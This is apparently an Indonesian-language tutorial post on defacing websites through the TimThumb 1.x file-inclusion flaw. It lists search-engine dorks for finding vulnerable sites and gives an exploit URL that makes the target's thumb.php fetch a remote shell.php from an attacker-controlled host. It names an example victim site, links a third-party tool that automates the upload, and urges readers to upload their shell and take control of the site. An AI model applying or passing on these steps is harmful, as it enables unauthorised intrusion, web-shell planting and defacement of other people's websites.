Halo ini Saya Guys, mau share cara deface poc timthumb MrNOOB07 TUTORIAL :V
Bahan-bahan :
- Hp/pc
- Internet
- Berusaha+Kesabaran :)
lalu
Exploit For Uploader :
- ?src=http://flickr.com.tukangpompajakarta.com/shell.php
Exploit For Timthumb :
- webtarget.com/timthumb.php
- webtarget.com/thumb.php
Dork :
- Inurl:/admin/thumb.php
- Inurl:/thumb.php
- Inurl:/thumb1.php
- Inurl:/timthumb.php
- Inurl:/admin/timthumb.php (Use Your Brain)
Note : yang bisa dikasih exploit ini hanya timthumb versi 1.* yaa
Langkah 1 : Jika web nya vuln (rentan) maka akan muncul seperti ini saat diberi exploit timthumb.
Langkah 2 :
Sekarang coba kita beri exploit untuk uploadernya :v
webtarget.com/thumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php
Contoh :
http://img.yibo.net/thumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php
Nah jika diberi exploit uploader jadi begitu, maka eror (web tidak bisa di eksekusi secara manual) langsung saja kita gunakan tools dari CWD https://wehealclinic.com/tools/thumb.php
Langkah 3 :
Bagaimana cara menggunakanya? cek tutor di berikut
1. Lu taruh web target lu di bagian atas
2. Pencet Execute
3. Nah muncul deh akses uploadernya :v
Langsung aja lu akses dan upload dah shell lu :v
Lalu bagaimana cara aksesknya jika shell sudah terupload??
Kalian pencet yang warna biru :)
Ok sekian tutor dari gw semoga bermanfaat bro
Wassalamualaikum
